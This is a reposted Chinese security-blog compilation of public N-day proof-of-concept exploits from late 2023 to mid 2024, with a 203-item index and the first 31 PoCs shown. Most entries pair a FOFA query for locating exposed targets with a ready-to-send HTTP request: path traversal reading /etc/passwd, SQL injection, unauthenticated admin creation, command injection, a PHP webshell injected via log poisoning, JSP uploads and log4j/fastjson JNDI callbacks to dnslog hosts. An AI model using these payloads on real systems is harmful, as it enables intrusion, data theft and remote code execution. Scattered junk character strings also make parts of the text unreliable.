Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from the public account 网络安全新视界, author 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises, and we hope this article is of some help to defenders. Defenders can use the contents of this article to check their own exposure.

Sources: the article covers 203 POCs for high-severity vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long are replaced by the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the most complete version available; when using it, just press F12 and search for the keyword.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents
1. StarRocks MPP database unauthorized access
2. Casdoor system static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <=20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list


1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor system static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

3 d0 t) T% E- z/ l
8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default account admin, perform the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the first-step login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

/ j' c6 q+ e/ ^6 H! d4 c# t* f% w$ {8 z; W+ X
12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST request; the injected function executes a command passed in base64 encoding.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step 3: send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

: k' ]7 h9 q; _+ a( V' ]$ L/ d$ @- Z% X! Z: B8 ^& A
13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

& n1 [' R% }( B1 @9 M) {  w7 \5 F& s& e$ w( z% r; ^- `
17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

- l2 g) D: J+ C, }( m" F3 l4 p% v) J
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}
" e  e6 _/ X! [+ c6 A
0 T8 U$ v+ a, R5 L
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友 (Yonyou) NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友 (Yonyou) NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 (Yonyou) NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友 (Yonyou) NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友 (Yonyou) NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友 (Yonyou) NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友 (Yonyou) NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
